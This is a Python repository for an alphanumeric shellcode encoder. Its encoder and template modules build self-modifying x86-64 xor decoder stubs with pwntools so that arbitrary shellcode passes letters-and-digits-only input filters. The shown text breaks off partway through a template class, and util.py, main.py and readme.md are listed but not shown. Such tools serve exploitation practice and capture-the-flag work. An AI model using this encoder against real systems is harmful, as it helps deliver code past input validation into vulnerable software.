├── .gitignore
├── encoder
    ├── __init__.py
    ├── encoder.py
    ├── shellcode_template.py
    └── util.py
├── main.py
└── readme.md


/.gitignore:
--------------------------------------------------------------------------------
  1 | # Created by .ignore support plugin (hsz.mobi)
  2 | ### JetBrains template
  3 | # Covers JetBrains IDEs: IntelliJ, RubyMine, PhpStorm, AppCode, PyCharm, CLion, Android Studio, WebStorm and Rider
  4 | # Reference: https://intellij-support.jetbrains.com/hc/en-us/articles/206544839
  5 | 
  6 | # User-specific stuff
  7 | .idea/**/workspace.xml
  8 | .idea/**/tasks.xml
  9 | .idea/**/usage.statistics.xml
 10 | .idea/**/dictionaries
 11 | .idea/**/shelf
 12 | 
 13 | # Generated files
 14 | .idea/**/contentModel.xml
 15 | 
 16 | # Sensitive or high-churn files
 17 | .idea/**/dataSources/
 18 | .idea/**/dataSources.ids
 19 | .idea/**/dataSources.local.xml
 20 | .idea/**/sqlDataSources.xml
 21 | .idea/**/dynamic.xml
 22 | .idea/**/uiDesigner.xml
 23 | .idea/**/dbnavigator.xml
 24 | 
 25 | # Gradle
 26 | .idea/**/gradle.xml
 27 | .idea/**/libraries
 28 | 
 29 | # Gradle and Maven with auto-import
 30 | # When using Gradle or Maven with auto-import, you should exclude module files,
 31 | # since they will be recreated, and may cause churn.  Uncomment if using
 32 | # auto-import.
 33 | # .idea/artifacts
 34 | # .idea/compiler.xml
 35 | # .idea/jarRepositories.xml
 36 | # .idea/modules.xml
 37 | # .idea/*.iml
 38 | # .idea/modules
 39 | # *.iml
 40 | # *.ipr
 41 | 
 42 | # CMake
 43 | cmake-build-*/
 44 | 
 45 | # Mongo Explorer plugin
 46 | .idea/**/mongoSettings.xml
 47 | 
 48 | # File-based project format
 49 | *.iws
 50 | 
 51 | # IntelliJ
 52 | out/
 53 | 
 54 | # mpeltonen/sbt-idea plugin
 55 | .idea_modules/
 56 | 
 57 | # JIRA plugin
 58 | atlassian-ide-plugin.xml
 59 | 
 60 | # Cursive Clojure plugin
 61 | .idea/replstate.xml
 62 | 
 63 | # Crashlytics plugin (for Android Studio and IntelliJ)
 64 | com_crashlytics_export_strings.xml
 65 | crashlytics.properties
 66 | crashlytics-build.properties
 67 | fabric.properties
 68 | 
 69 | # Editor-based Rest Client
 70 | .idea/httpRequests
 71 | 
 72 | # Android studio 3.1+ serialized cache file
 73 | .idea/caches/build_file_checksums.ser
 74 | 
 75 | ### Vim template
 76 | # Swap
 77 | [._]*.s[a-v][a-z]
 78 | !*.svg  # comment out if you don't need vector files
 79 | [._]*.sw[a-p]
 80 | [._]s[a-rt-v][a-z]
 81 | [._]ss[a-gi-z]
 82 | [._]sw[a-p]
 83 | 
 84 | # Session
 85 | Session.vim
 86 | Sessionx.vim
 87 | 
 88 | # Temporary
 89 | .netrwhist
 90 | *~
 91 | # Auto-generated tag files
 92 | tags
 93 | # Persistent undo
 94 | [._]*.un~
 95 | 
 96 | ### Kate template
 97 | # Swap Files #
 98 | .*.kate-swp
 99 | .swp.*
100 | 
101 | ### Example user template template
102 | ### Example user template
103 | 
104 | # IntelliJ project files
105 | .idea
106 | *.iml
107 | out
108 | gen
109 | ### Python template
110 | # Byte-compiled / optimized / DLL files
111 | __pycache__/
112 | *.py[cod]
113 | *$py.class
114 | 
115 | # C extensions
116 | *.so
117 | 
118 | # Distribution / packaging
119 | .Python
120 | build/
121 | develop-eggs/
122 | dist/
123 | downloads/
124 | eggs/
125 | .eggs/
126 | lib/
127 | lib64/
128 | parts/
129 | sdist/
130 | var/
131 | wheels/
132 | share/python-wheels/
133 | *.egg-info/
134 | .installed.cfg
135 | *.egg
136 | MANIFEST
137 | 
138 | # PyInstaller
139 | #  Usually these files are written by a python script from a template
140 | #  before PyInstaller builds the exe, so as to inject date/other infos into it.
141 | *.manifest
142 | *.spec
143 | 
144 | # Installer logs
145 | pip-log.txt
146 | pip-delete-this-directory.txt
147 | 
148 | # Unit test / coverage reports
149 | htmlcov/
150 | .tox/
151 | .nox/
152 | .coverage
153 | .coverage.*
154 | .cache
155 | nosetests.xml
156 | coverage.xml
157 | *.cover
158 | *.py,cover
159 | .hypothesis/
160 | .pytest_cache/
161 | cover/
162 | 
163 | # Translations
164 | *.mo
165 | *.pot
166 | 
167 | # Django stuff:
168 | *.log
169 | local_settings.py
170 | db.sqlite3
171 | db.sqlite3-journal
172 | 
173 | # Flask stuff:
174 | instance/
175 | .webassets-cache
176 | 
177 | # Scrapy stuff:
178 | .scrapy
179 | 
180 | # Sphinx documentation
181 | docs/_build/
182 | 
183 | # PyBuilder
184 | .pybuilder/
185 | target/
186 | 
187 | # Jupyter Notebook
188 | .ipynb_checkpoints
189 | 
190 | # IPython
191 | profile_default/
192 | ipython_config.py
193 | 
194 | # pyenv
195 | #   For a library or package, you might want to ignore these files since the code is
196 | #   intended to run in multiple environments; otherwise, check them in:
197 | # .python-version
198 | 
199 | # pipenv
200 | #   According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control.
201 | #   However, in case of collaboration, if having platform-specific dependencies or dependencies
202 | #   having no cross-platform support, pipenv may install dependencies that don't work, or not
203 | #   install all needed dependencies.
204 | #Pipfile.lock
205 | 
206 | # PEP 582; used by e.g. github.com/David-OConnor/pyflow
207 | __pypackages__/
208 | 
209 | # Celery stuff
210 | celerybeat-schedule
211 | celerybeat.pid
212 | 
213 | # SageMath parsed files
214 | *.sage.py
215 | 
216 | # Environments
217 | .env
218 | .venv
219 | env/
220 | venv/
221 | ENV/
222 | env.bak/
223 | venv.bak/
224 | 
225 | # Spyder project settings
226 | .spyderproject
227 | .spyproject
228 | 
229 | # Rope project settings
230 | .ropeproject
231 | 
232 | # mkdocs documentation
233 | /site
234 | 
235 | # mypy
236 | .mypy_cache/
237 | .dmypy.json
238 | dmypy.json
239 | 
240 | # Pyre type checker
241 | .pyre/
242 | 
243 | # pytype static type analyzer
244 | .pytype/
245 | 
246 | # Cython debug symbols
247 | cython_debug/
248 | 
249 | ### Linux template
250 | *~
251 | 
252 | # temporary files which can be created if a process still has a handle open of a deleted file
253 | .fuse_hidden*
254 | 
255 | # KDE directory preferences
256 | .directory
257 | 
258 | # Linux trash folder which might appear on any partition or disk
259 | .Trash-*
260 | 
261 | # .nfs files are created when an open file is removed but is still being accessed
262 | .nfs*
263 | 
264 | ### Windows template
265 | # Windows thumbnail cache files
266 | Thumbs.db
267 | Thumbs.db:encryptable
268 | ehthumbs.db
269 | ehthumbs_vista.db
270 | 
271 | # Dump file
272 | *.stackdump
273 | 
274 | # Folder config file
275 | [Dd]esktop.ini
276 | 
277 | # Recycle Bin used on file shares
278 | $RECYCLE.BIN/
279 | 
280 | # Windows Installer files
281 | *.cab
282 | *.msi
283 | *.msix
284 | *.msm
285 | *.msp
286 | 
287 | # Windows shortcuts
288 | *.lnk
289 | 
290 | 


--------------------------------------------------------------------------------
/encoder/__init__.py:
--------------------------------------------------------------------------------
1 | from .encoder import Encoder, encode
2 | 


--------------------------------------------------------------------------------
/encoder/encoder.py:
--------------------------------------------------------------------------------
  1 | from encoder import util
  2 | from .shellcode_template import CodeInit, AutoNumGen, Mov, MulReg, Padding, ShellCodeXor
  3 | import typing
  4 | 
  5 | import pwn
  6 | 
# Offsets, relative to a block's base offset, of payload bytes that still
# have to be xor-patched by the decoder.
IdxList = typing.List[int]
# One encoding block: (base offset into the payload, offsets inside the block).
EncBlock = typing.Tuple[int, IdxList]
# Progress logger assigned by encode(); Encoder.encode() reports its status
# through it whenever it is not None.
log_process = None
 10 | 
 11 | 
 12 | class Encoder(object):
 13 |     def __init__(self, shellcode, base_reg: str, offset: int = 0):
 14 |         self.base_reg = base_reg
 15 |         self.offset = offset
 16 |         self.shellcode = shellcode
 17 |         self.origin_shellcode = shellcode
 18 | 
 19 |     def encode(self):
 20 |         shift_offset = 0
 21 |         shellcode_list = self.block_encode_gen()
 22 |         while True:
 23 |             all_shellcode = ''
 24 |             all_shellcode += Mov(self.base_reg, "rbx")
 25 |             all_shellcode += CodeInit()
 26 |             for idx, shellcode in shellcode_list:
 27 |                 enc_offset = idx + self.offset + shift_offset
 28 |                 re = None
 29 |                 if enc_offset > 0 and util.num_size(enc_offset) <= 2:
 30 |                     re = MulReg.find_mul(enc_offset)
 31 |                 if re is None:
 32 |                     all_shellcode += AutoNumGen(enc_offset)
 33 |                     all_shellcode += Mov(src="rax", dst="rsi")
 34 |                     all_shellcode += shellcode
 35 |                 else:
 36 |                     mul1, mul2 = re
 37 |                     all_shellcode += MulReg(mul1=mul1, mul2=mul2, dst="si")
 38 |                     all_shellcode += shellcode
 39 |             asm_code = util.asm(all_shellcode)
 40 |             # print(f"we try offset: {shift_offset}")
 41 |             # print(f"the shellcode length: {len(asm_code)}")
 42 |             if len(asm_code) < shift_offset:
 43 |                 break
 44 | 
 45 |             global log_process
 46 |             if log_process is not None:
 47 |                 process_num = round((shift_offset / len(asm_code)) * 100)
 48 |                 log_process.status(f" ({process_num}%)")
 49 | 
 50 |             inc_count = (len(asm_code) - shift_offset) // 5
 51 |             if inc_count == 0:
 52 |                 inc_count = 1
 53 |             shift_offset += inc_count
 54 |         padding_size = shift_offset - len(asm_code)
 55 |         asm_code += util.asm(str(Padding(padding_size)))
 56 |         return asm_code + self.shellcode
 57 | 
 58 |     def block_encode_gen(self):
 59 |         enc_blocks = self.split_enc_idx()
 60 |         shellcode_list = []
 61 |         for enc_block in enc_blocks:
 62 |             shellcode = ''
 63 |             while len(enc_block[1]) != 0:
 64 |                 enc_shellcode, re_enc_block, part_shellcode, score = self.byte_xor_strategy(enc_block)
 65 |                 re = self.word_xor_strategy(enc_block)
 66 |                 if re is not None and re[3] < score:
 67 |                     self.shellcode = re[0]
 68 |                     enc_block = re[1]
 69 |                     shellcode += re[2]
 70 |                 else:
 71 |                     self.shellcode = enc_shellcode
 72 |                     enc_block = re_enc_block
 73 |                     shellcode += part_shellcode
 74 |             shellcode_list.append((enc_block[0], shellcode))
 75 |         return shellcode_list
 76 | 
 77 |     # def dword_xor_strategy(self, enc_block: EncBlock) -> typing.Tuple[bytes, EncBlock, str, float]:
 78 |     #     enc_shellcode = bytearray(self.shellcode)
 79 |     #     off = enc_block[0]
 80 |     #     idx_list = enc_block[1]
 81 |     #     xor_map = {}
 82 |     #     for idx in idx_list:
 83 |     #         xor_data = 0
 84 |     #         for i in range(4):
 85 |     #             self.shellcode
 86 | 
 87 |     def word_xor_strategy(self, enc_block: EncBlock) -> typing.Tuple[bytes, EncBlock, str, float]:
 88 |         enc_shellcode = bytearray(self.shellcode)
 89 |         off = enc_block[0]
 90 |         idx_list = enc_block[1]
 91 |         enc_bytes = [self.shellcode[off + i] for i in idx_list]
 92 |         xor_map = self.find_max_match(enc_bytes)
 93 | 
 94 |         # data_list = [(idx, xor_map[self.shellcode[off + idx]]) for idx in idx_list]
 95 |         i = 0
 96 |         word_data_list: typing.List[typing.Tuple[int, int]] = []
 97 |         idx_length = len(idx_list)
 98 |         while i < idx_length - 1:
 99 |             if idx_list[i + 1] - idx_list[i] == 1:
100 |                 idx = idx_list[i]
101 |                 word_data_list.append((idx, (xor_map[self.shellcode[off + idx]]) + xor_map[
102 |                     self.shellcode[off + idx + 1]] << 8))
103 |             i += 1
104 | 
105 |         if len(word_data_list) == 0:
106 |             return None
107 | 
108 |         idx_map = {}
109 |         for i in word_data_list:
110 |             if i[1] in idx_map:
111 |                 idx_map[i[1]].append(i[0])
112 |             else:
113 |                 idx_map[i[1]] = [i[0]]
114 | 
115 |         xor_list = [(key, value) for key, value in idx_map.items()]
116 |         xor_list.sort(key=lambda x: len(x[1]), reverse=True)
117 |         xor_data = xor_list[0][0]
118 |         xor_idx = xor_list[0][1]
119 | 
120 |         i = 0
121 |         while i < len(xor_idx) - 1:  # avoid some case like "\x00\x00\x00\x00"
122 |             if xor_idx[i + 1] - xor_idx[i] == 1:
123 |                 xor_idx.pop(i + 1)
124 |             i += 1
125 | 
126 |         encode_byte_count = 0
127 | 
128 |         shellcode = ''
129 |         shellcode += AutoNumGen(xor_data)
130 |         for idx in xor_idx:
131 |             shellcode += "xor [rbx+rsi+{idx:#x}], ax\n".format(idx=idx)
132 |             idx_list.remove(idx)
133 |             idx_list.remove(idx + 1)
134 |             enc_shellcode[off + idx] ^= xor_data & 0xff
135 |             enc_shellcode[off + idx + 1] ^= xor_data >> 8
136 |             encode_byte_count += 2
137 | 
138 |         i = 0
139 |         while i < len(idx_list):
140 |             idx = idx_list[i]
141 |             enc_data = xor_map[self.shellcode[off + idx]]
142 |             if enc_data == xor_data & 0xff:
143 |                 shellcode += "xor [rbx+rsi+{idx:#x}], al\n".format(idx=idx)
144 |                 idx_list.pop(i)
145 |                 enc_shellcode[off + idx] ^= xor_data & 0xff
146 |                 encode_byte_count += 1
147 |             elif enc_data == xor_data >> 8:
148 |                 shellcode += "xor [rbx+rsi+{idx:#x}], ah\n".format(idx=idx)
149 |                 idx_list.pop(i)
150 |                 enc_shellcode[off + idx] ^= xor_data >> 8
151 |                 encode_byte_count += 1
152 |             else:
153 |                 i += 1
154 | 
155 |         shellcode_length = len(util.asm(shellcode))
156 | 
157 |         return bytes(enc_shellcode), (off, idx_list), shellcode, shellcode_length / encode_byte_count
158 | 
159 |     def byte_xor_strategy(self, enc_block: EncBlock) -> typing.Tuple[bytes, EncBlock, str, float]:
160 |         enc_shellcode = bytearray(self.shellcode)
161 |         off = enc_block[0]
162 |         idx_list = enc_block[1]
163 |         enc_bytes = [self.shellcode[off + i] for i in idx_list]
164 |         xor_map = self.find_max_match(enc_bytes)
165 | 
166 |         idx_map: typing.Dict[int, typing.List[int]] = {}
167 | 
168 |         for i in idx_list:
169 |             xor_data = xor_map[self.shellcode[off + i]]
170 |             if xor_data in idx_map:
171 |                 idx_map[xor_data].append(i)
172 |             else:
173 |                 idx_map[xor_data] = [i]
174 | 
175 |         xor_list = [(key, value) for key, value in idx_map.items()]
176 |         xor_list.sort(key=lambda x: len(x[1]), reverse=True)
177 | 
178 |         # select the max two
179 |         low_data = xor_list[0][0]
180 |         low_enc_idx = xor_list[0][1]
181 |         if len(xor_list) > 1:
182 |             high_data = xor_list[1][0]
183 |             high_enc_idx = xor_list[1][1]
184 |         else:
185 |             high_data = 0
186 |             high_enc_idx = []
187 | 
188 |         enc_bytes_count = len(low_enc_idx) + len(high_enc_idx)
189 | 
190 |         # first gen data
191 |         data = low_data + (high_data << 8)
192 |         shellcode = ''
193 |         shellcode += AutoNumGen(data=data)
194 |         for idx in low_enc_idx:
195 |             shellcode += "xor [rbx+rsi+{idx:#x}], al\n".format(idx=idx)
196 |             idx_list.remove(idx)
197 |             enc_shellcode[off + idx] ^= low_data
198 |         for idx in high_enc_idx:
199 |             shellcode += "xor [rbx+rsi+{idx:#x}], ah\n".format(idx=idx)
200 |             idx_list.remove(idx)
201 |             enc_shellcode[off + idx] ^= high_data
202 | 
203 |         shellcode_length = len(util.asm(shellcode))
204 |         score = shellcode_length / enc_bytes_count
205 |         return bytes(enc_shellcode), (off, idx_list), shellcode, score
206 | 
207 |     def data_scan(self):
208 |         need_enc = []
209 |         shellcode = bytearray(self.shellcode)
210 |         i = 0
211 |         shellcode_length = len(shellcode)
212 |         while i < shellcode_length:
213 |             if shellcode[i] not in util.alphanum_pool:
214 |                 need_enc.append(i)
215 |             i += 1
216 |         return need_enc
217 | 
218 |     def split_enc_idx(self) -> typing.List[typing.Tuple[int, IdxList]]:
219 |         need_enc = self.data_scan()
220 |         enc_blocks = []
221 | 
222 |         while len(need_enc) != 0:
223 |             max_size = 0
224 |             max_offset = 0
225 |             first_idx = need_enc[0]
226 |             base_offset = first_idx - 0x7a
227 |             while base_offset <= first_idx - 0x30:
228 |                 point = 0
229 |                 for idx in need_enc:
230 |                     off = idx - base_offset
231 |                     if 0x30 <= off <= 0x39 or 0x41 <= off <= 0x5a or 0x61 <= off <= 0x7a:
232 |                         point += 1
233 | 
234 |                 if point > max_size:
235 |                     max_size = point
236 |                     max_offset = base_offset
237 |                 base_offset += 1
238 | 
239 |             i = 0
240 |             enc_block = []
241 |             while i < len(need_enc):
242 |                 off = need_enc[i] - max_offset
243 |                 if 0x30 <= off <= 0x39 or 0x41 <= off <= 0x5a or 0x61 <= off <= 0xff:
244 |                     enc_block.append(off)
245 |                     need_enc.pop(i)
246 |                 else:
247 |                     i += 1
248 | 
249 |             enc_blocks.append((max_offset, enc_block))
250 |         return enc_blocks
251 | 
252 |     @staticmethod
253 |     def find_max_match(data: typing.List[int]) -> dict:
254 |         xor_data_map = {}
255 | 
256 |         while len(data) != 0:
257 |             max_point = 0
258 |             max_data = 0
259 | 
260 |             # we prefer alphanum
261 |             l = [i for i in range(0x100)]
262 |             l.sort(key=lambda x: x in util.alphanum_pool, reverse=True)
263 |             for i in l:
264 |                 point = 0
265 |                 for d in data:
266 |                     if d ^ i in util.alphanum_pool:
267 |                         point += 1
268 | 
269 |                 if point > max_point:
270 |                     max_point = point
271 |                     max_data = i
272 | 
273 |             i = 0
274 |             while i < len(data):
275 |                 if data[i] ^ max_data in util.alphanum_pool:
276 |                     xor_data_map[data[i]] = max_data
277 |                     data.pop(i)
278 |                 else:
279 |                     i += 1
280 |         return xor_data_map
281 | 
282 | 
def encoder_with_xor_compress(shellcode: bytes, base_reg, offset=0):
    """Encode a ``ShellCodeXor`` stub and append the xor-transformed payload.

    The stub is sized with ``len(shellcode) // 8 + 1``, assembled, run through
    ``Encoder`` and followed by ``ShellCodeXor.shellcode_xor(shellcode)``.
    """
    stub = ShellCodeXor((len(shellcode) // 8) + 1)
    stub_bytes = util.asm(str(stub))
    stub_encoder = Encoder(shellcode=stub_bytes, base_reg=base_reg, offset=offset)
    result = stub_encoder.encode()
    result += ShellCodeXor.shellcode_xor(shellcode)
    return result
289 | 
290 | 
def encoder_direct(shellcode: bytes, base_reg, offset=0):
    """Encode ``shellcode`` itself with ``Encoder`` and return the result."""
    return Encoder(shellcode=shellcode, base_reg=base_reg, offset=offset).encode()
295 | 
296 | 
def encode(shellcode: bytes, base_reg, offset=0):
    """Encode ``shellcode`` with both strategies and return the shorter result.

    Step 1 encodes the payload directly, step 2 encodes a xor stub plus the
    transformed payload.  When both results have the same length the second
    one is returned.

    The module-level ``log_process`` points at the running progress logger
    while a step executes.  It is marked failed if the step raises and is
    always cleared afterwards, so later ``Encoder.encode()`` calls do not
    report into a finished logger.
    """
    global log_process
    steps = (
        ("shellcode is generating step(1/2), plz wait", encoder_direct),
        ("shellcode is generating step(2/2), plz wait", encoder_with_xor_compress),
    )
    results = []
    try:
        for message, strategy in steps:
            log_process = pwn.log.progress(message)
            try:
                results.append(strategy(shellcode, base_reg, offset))
            except Exception:
                log_process.failure()
                raise
            log_process.success()
    finally:
        log_process = None

    shellcode1, shellcode2 = results
    return shellcode1 if len(shellcode1) < len(shellcode2) else shellcode2
306 | 


--------------------------------------------------------------------------------
/encoder/shellcode_template.py:
--------------------------------------------------------------------------------
  1 | from encoder import util
  2 | from functools import cached_property
  3 | 
  4 | 
  5 | class Shellcode(object):
  6 | 
  7 |     @cached_property
  8 |     def asm(self):
  9 |         return util.asm(str(self))
 10 | 
 11 |     def __len__(self):
 12 |         return len(self.asm)
 13 | 
 14 |     def code(self):
 15 |         raise Exception("do not call virtual class")
 16 | 
 17 |     def __str__(self):
 18 |         return self.code
 19 | 
 20 |     def __add__(self, other):
 21 |         return str(self) + str(other)
 22 | 
 23 |     def __radd__(self, other):
 24 |         return str(other) + str(self)
 25 | 
 26 | 
 27 | class Mov(Shellcode):
 28 |     stack_mov = """
 29 | push {src}
 30 | pop {dst}
 31 | """
 32 | 
 33 |     stack_mov2 = """
 34 | push {src}
 35 | push rsp
 36 | pop rcx
 37 | xor [rcx], {dst}
 38 | xor {dst}, [rcx] 
 39 | """
 40 |     stack_mov3 = """ 
 41 | push {src}
 42 | push rsp
 43 | pop {tmp}
 44 | xor {src}, [{tmp}+0x30]
 45 | xor [{tmp}+0x30], {src}
 46 | xor [{tmp}+0x30], {dst}
 47 | xor {dst}, [{tmp}+0x30]
 48 | """
 49 | 
 50 |     def __init__(self, src, dst):
 51 |         self.src = src
 52 |         self.dst = dst
 53 | 
 54 |     @cached_property
 55 |     def code(self):
 56 |         if self.dst in ("rax", "rcx", "rdx", "r8", "r9", "r10"):
 57 |             return self.stack_mov.format(src=self.src, dst=self.dst)
 58 |         elif self.dst in ("rdi", "rsi"):
 59 |             return self.stack_mov2.format(src=self.src, dst=self.dst)
 60 |         elif self.dst in ("rbx", "r11", "r12", "r13", "r14", "r15", "rsp", "rbp"):
 61 |             if self.src == "rcx":
 62 |                 tmp = "rdx"
 63 |             else:
 64 |                 tmp = "rcx"
 65 |             return self.stack_mov3.format(src=self.src, dst=self.dst, tmp=tmp)
 66 |         else:
 67 |             raise Exception(f"can't mov to reg {self.dst}")
 68 | 
 69 | 
 70 | class Zero(Shellcode):
 71 |     clean_rax = """
 72 | push 0x30
 73 | pop rax
 74 | xor al, 0x30
 75 | """
 76 |     clean2 = """
 77 | push {reg}
 78 | push rsp
 79 | pop rcx
 80 | xor {reg}, [rcx]
 81 | """
 82 | 
 83 |     def __init__(self, reg):
 84 |         self.clean_reg = reg
 85 | 
 86 |     @cached_property
 87 |     def code(self):
 88 |         if self.clean_reg == "rax":
 89 |             return self.clean_rax
 90 |         elif self.clean_reg in (
 91 |                 "rcx", "rdx", "r8", "r9", "r10", "rbx", "r11", "r12", "r13", "r14", "r15", "rsp", "rbp"):
 92 |             return self.clean_rax + Mov(src="rax", dst=self.clean_reg)
 93 |         elif self.clean_reg in ("rdi", "rsi"):
 94 |             return self.clean2.format(reg=self.clean_reg)
 95 |         else:
 96 |             raise Exception(f"can't clean reg {self.clean_reg}")
 97 | 
 98 | 
 99 | class MulReg(Shellcode):
100 |     mul_reg = '''
101 | push {mul1:#x}
102 | push rsp
103 | pop {tmp}
104 | imul {dst}, WORD PTR [{tmp}], {mul2:#x}
105 | '''
106 | 
107 |     # imul will modify rdi/rsi, this not easy to set
108 |     # so ask to select one
109 |     def __init__(self, mul1: int, mul2: int, dst: str = "di", modify_reg: str = "rax"):
110 |         # keep mul1 the small one
111 |         assert dst in ("di", "si")
112 |         if modify_reg not in ("rcx", "rax", "r8", "r9"):
113 |             raise Exception("the src reg must in rcx, rax, r8, r9")
114 |         self.dst = dst
115 |         self.modify_reg = modify_reg
116 |         self.mul1, self.mul2 = (mul1, mul2) if mul1 < mul2 else (mul2, mul1)
117 | 
118 |         mul2_size = util.num_size(self.mul2)
119 |         mul1_size = util.num_size(self.mul1)
120 |         assert mul1_size <= 2
121 |         assert mul2_size <= 2
122 |         assert util.is_alphanumeric(self.mul1, mul1_size)
123 |         assert util.is_alphanumeric(self.mul2, mul2_size)
124 | 
125 |         self.mul1 = self.mul1 if mul1_size == 1 else self.mul1 | 0x30300000
126 | 
127 |     @cached_property
128 |     def code(self):
129 |         return self.mul_reg.format(mul1=self.mul1, mul2=self.mul2, dst=self.dst, tmp=self.modify_reg)
130 | 
131 |     @staticmethod
132 |     def find_mul(data: int):
133 |         assert util.num_size(data) <= 2
134 |         for i in util.mul_iter():
135 |             if i[0] * i[1] & 0xffff == data:
136 |                 return i
137 |         return None
138 | 
139 | 
class XorReg(Shellcode):
    """Load rax with ``xor1`` and xor its low part with ``xor2``."""

    xor_reg = (
        "\n"
        "push {xor1:#x}\n"
        "pop rax\n"
        "xor {reg}, {xor2:#x}\n"
    )
    # operand size in bytes -> sub-register of rax
    reg_map = {1: "al", 2: "ax", 4: "eax"}

    def __init__(self, xor1: int, xor2: int):
        size1 = util.num_size(xor1)
        size2 = util.num_size(xor2)
        assert size1 <= 4
        assert size2 <= 4
        assert util.is_alphanumeric(xor1, size1)
        assert util.is_alphanumeric(xor2, size2)
        if size1 == 2 and size2 == 2:
            # Widen both operands to 32 bits with 0x3030 in the upper half.
            xor1 |= 0x30300000
            xor2 |= 0x30300000
        elif size1 == 2:
            xor1, xor2 = xor2, xor1

        self.xor1 = xor1
        self.xor2 = xor2

    @cached_property
    def code(self):
        """Assembly text; the xor register is chosen from the size of ``xor2``."""
        register = self.reg_map[util.num_size(self.xor2)]
        return self.xor_reg.format(xor1=self.xor1, xor2=self.xor2, reg=register)

    @staticmethod
    def find_xor(data: int):
        """Return a pair of numbers whose xor is ``data``.

        The pair is assembled from ``util.xor_table`` lookups for the bytes
        of ``data`` that are not in ``util.alphanum_pool``.  Returns ``None``
        for a size other than 1, 2 or 4.
        """
        width = util.num_size(data)
        assert width <= 4

        if width == 1:
            return util.xor_table[data]

        if width == 2:
            raw = util.p16(data)
            if raw[1] in util.alphanum_pool:
                # Only the low byte needs a partner.
                _, mask = util.xor_table[raw[0]]
                return data ^ mask, mask
            mask = util.u16(bytes(util.xor_table[b][0] for b in raw))
            return mask, mask ^ data

        if width == 4:
            raw = util.p32(data)
            upper_ok = raw[2] in util.alphanum_pool and raw[3] in util.alphanum_pool
            if not upper_ok:
                mask = util.u32(bytes(util.xor_table[b][0] for b in raw))
                return mask, mask ^ data
            if raw[1] in util.alphanum_pool:
                _, mask = util.xor_table[raw[0]]
            else:
                mask = util.u16(bytes(util.xor_table[b][0] for b in raw[:2]))
            return data ^ mask, mask

        return None
197 | 
198 | 
class MulXorReg(Shellcode):
    """Build a 16-bit value in rax as ``(mul1 * mul2) ^ xor``.

    The product is computed into ``modify_reg`` (di or si) with ``MulReg``,
    copied to rax and finally xored with ``xor``.
    """

    mul_xor_reg = '''
xor {reg}, {xor:#x}
'''
    # operand size in bytes -> sub-register of rax
    reg_map = {1: "al", 2: "ax"}

    def __init__(self, mul1: int, mul2: int, xor: int, modify_reg="di"):
        assert modify_reg in ("di", "si")
        self.mul1 = mul1
        self.mul2 = mul2

        xor_size = util.num_size(xor)
        assert xor_size <= 2
        # Validate the xor operand itself (value and size), as every other
        # is_alphanumeric call in this module does; the size alone was
        # passed here before.
        assert util.is_alphanumeric(xor, xor_size)

        self.xor = xor
        self.modify_reg = modify_reg

    @cached_property
    def code(self):
        """Assembly text: imul into di/si, move to rax, xor al/ax."""
        code = ''
        code += MulReg(self.mul1, self.mul2, dst=self.modify_reg)
        code += Mov("r" + self.modify_reg, "rax")
        code += self.mul_xor_reg.format(reg=self.reg_map[util.num_size(self.xor)], xor=self.xor)
        return code

    @staticmethod
    def find_mul_xor(data: int):
        """Return ``(mul1, mul2, xor)`` with ``(mul1 * mul2 & 0xffff) ^ xor == data``.

        The first pair from ``util.mul_iter()`` whose remainder passes
        ``util.is_alphanumeric(..., 2)`` is used; ``None`` if there is none.
        """
        assert util.num_size(data) <= 2
        for mul1, mul2 in ((pair[0], pair[1]) for pair in util.mul_iter()):
            remainder = (mul1 * mul2 & 0xffff) ^ data
            if util.is_alphanumeric(remainder, 2):
                return mul1, mul2, remainder
        return None
232 | 
233 | 
class CodeInit(Shellcode):
    """Decoder prologue: clear rdi/rsi and preload r8, r9 and r10.

    The constants 0x8080, 0x8010 and 0x0080 are each produced in di by a
    ``MulReg`` and then copied into r8, r9 and r10 respectively.
    """

    @cached_property
    def code(self):
        pieces = [str(Zero("rdi")), str(Zero("rsi"))]
        for constant, holder in ((0x8080, "r8"), (0x8010, "r9"), (0x0080, "r10")):
            mul1, mul2 = MulReg.find_mul(constant)
            pieces.append(str(MulReg(mul1=mul1, mul2=mul2)))
            pieces.append(str(Mov(src="rdi", dst=holder)))
        return ''.join(pieces)
254 | 
255 | 
class FastNumGen(Shellcode):
    """Load a value of at most two bytes into rax.

    Values with bit 7 and/or bit 15 set start from one of the constants
    kept in r8 (0x8080), r9 (0x8010) or r10 (0x0080) and xor the difference
    in; all other values are built directly with ``XorReg``.
    """

    # operand size in bytes -> sub-register of rax
    reg_map = {1: "al", 2: "ax"}

    def __init__(self, data: int):
        assert util.num_size(data) <= 2
        self.data = data

    @cached_property
    def code(self):
        # (bits that must be set, register holding the seed, seed value);
        # checked in this order.
        seeds = (
            (0x8080, "r8", 0x8080),
            (0x8000, "r9", 0x8010),
            (0x0080, "r10", 0x0080),
        )
        for required, src_reg, src_num in seeds:
            if self.data & required == required:
                break
        else:
            # No high bit involved: a push plus one xor is enough.
            xor1, xor2 = XorReg.find_xor(self.data)
            return str(XorReg(xor1=xor1, xor2=xor2))

        code = '' + Mov(src=src_reg, dst="rax")

        xor_num = self.data ^ src_num
        if xor_num == 0:
            return code
        if xor_num < 0x80 and util.is_alphanumeric(xor_num, 1):
            return code + f"xor al, {xor_num}\n"
        if util.is_alphanumeric(xor_num, 2):
            return code + f"xor ax, {xor_num}\n"

        # The difference cannot be used as one immediate: split it in two.
        xor1, xor2 = XorReg.find_xor(xor_num)
        code += f"xor {self.reg_map[util.num_size(xor1)]}, {xor1}\n"
        code += f"xor {self.reg_map[util.num_size(xor2)]}, {xor2}\n"
        return code
293 | 
294 | 
class NumGen(Shellcode):
    """Load a 64-bit value into rax, 16 bits at a time.

    The qword at [rsp+0x30] is cleared, each non-zero 16-bit word of the
    value is xored into its place there, and the result is read back into
    rax.  rcx is used as the pointer to the stack.
    """

    def __init__(self, data: int):
        self.data = data

    @cached_property
    def code(self):
        # (word value, word position); sorting puts equal words next to each
        # other so one generated value can serve several positions.
        words = sorted(((self.data >> (16 * pos)) & 0xffff, pos) for pos in range(4))

        # set rcx == rsp
        text = (
            "\n"
            "push rsp\n"
            "pop rcx\n"
        )
        text += Zero("rax")

        # rax (zero) picks up the old slot content, which then cancels the slot.
        text += (
            "    \n"
            "xor rax, [rcx+0x30]\n"
            "xor [rcx+0x30], rax\n"
        )

        # TODO: this can be optimize
        last_value = None
        for value, pos in words:
            if value == 0:
                continue
            if value != last_value:
                text += AutoNumGen(data=value)
            last_value = value
            text += 'xor [rcx+0x%x], ax\n' % (pos * 2 + 0x30)

        # Swap the assembled slot content into rax.
